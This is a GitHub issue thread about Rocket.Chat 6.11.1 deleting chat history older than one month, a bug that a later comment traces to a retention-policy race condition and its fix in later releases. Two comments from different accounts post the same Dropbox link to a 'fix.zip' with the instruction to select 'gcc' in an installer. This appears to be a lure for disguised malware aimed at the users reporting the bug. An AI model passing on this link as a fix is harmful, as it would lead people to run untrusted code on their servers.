### ISSUE TITLE
RocketChat 6.11.1 prunes messages to the previous month

### ISSUE THREAD

**Issue by akong77** [RocketChat/Rocket.Chat#33146]
Description

My original setting was to delete messages from 3 years ago, but today some users reported that they only saw messages from the previous month. What happened?
Server Setup Information

    Version of Rocket.Chat Server:
    Operating System: Ubuntu 20.04
    Deployment Method: snap
    Number of Running Instances: 1
    DB Replicaset Oplog: 304
    NodeJS Version: v14.21.2
    MongoDB Version: 5.0.15
    Proxy: caddy
    Firewalls involved:

Any additional Information

圖片
[圖片772×683 23.1 KB](https://global.discourse-cdn.com/business4/uploads/rocketchat/original/2X/f/f89871820d068c6d6d52ab35b585c9121781a3ea.png)

But just see previous month message.
圖片
[圖片1282×332 21.5 KB](https://global.discourse-cdn.com/business4/uploads/rocketchat/original/2X/7/70ac3d24e3d1fe8762b696d43288bce601b88002.png)

My server is at least 2 years old

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by akong77** [comment]
> Download https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1 In the installer menu, select "gcc."

??

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by akong77** [comment]
I got this error
![圖片](https://github.com/user-attachments/assets/a5d1e503-de0a-4f12-a16c-cb20ab735fbd)

**Comment by akong77** [comment]
The link can't found any file.

**Comment by krzysztof-osiecki** [comment]
Same happened to us, maybe related https://github.com/RocketChat/Rocket.Chat/pull/32425?

**Comment by akong77** [comment]
I don't know if this problem affects it, but it is true that my historical records only have the last one month, but I set to clear the records from 3 years ago. I don't know what happened.

**Comment by reetp** [comment]
What do your logs say please?

> The link can't found any file.

No idea why this is relevant.

**Comment by teach404** [comment]
https://github.com/RocketChat/Rocket.Chat/issues/33010  <- still not implemented in 6.11.1 maybe?

**Comment by akong77** [comment]
> > #33010  <- still not implemented in 6.11.1 maybe?
> 
> I think you are correct.

I think 6.11.1 has this problem.

**Comment by bombaata** [comment]
same behaviour here after upgrading from 6.6 to 6.11.1. All direct and group messages were pruned.

**Comment by mextex** [comment]
Same Problem here. Is the problem already solved?

**Comment by reetp** [comment]
> Same problem here. Is the issue already solved?

Without you filling out your server details no one can tell....

We have no idea which version you are using.

You should check the releases pages to see if this issue mentioned.

**Comment by mextex** [comment]
Sorry

> > Same problem here. Is the issue already solved?
> 
> Without you filling out your server details no one can tell....
> 
> We have no idea which version you are using.
> 
> You should check the releases pages to see if this issue mentioned.

We use the latest version (6.12.1) under a community licence. The issue is not addressed in the release notes.

**Comment by julio-cfa** [comment]
There was indeed a race condition issue in 6.11.1 (and other versions) that would prune messages when updating from an older version. It happened because the retention policy would default to 30 days due to the race condition and delete all messages older than 30 days.

The release notes of 6.11.1 were updated to mention it: https://github.com/RocketChat/Rocket.Chat/releases/tag/6.11.1. This issue was fixed in 6.13.0 (https://github.com/RocketChat/Rocket.Chat/pull/33237) and backported to 6.12.1, 6.11.3, and 6.10.6. 

It seems to me that it is the same bug that ended up affecting your workspace
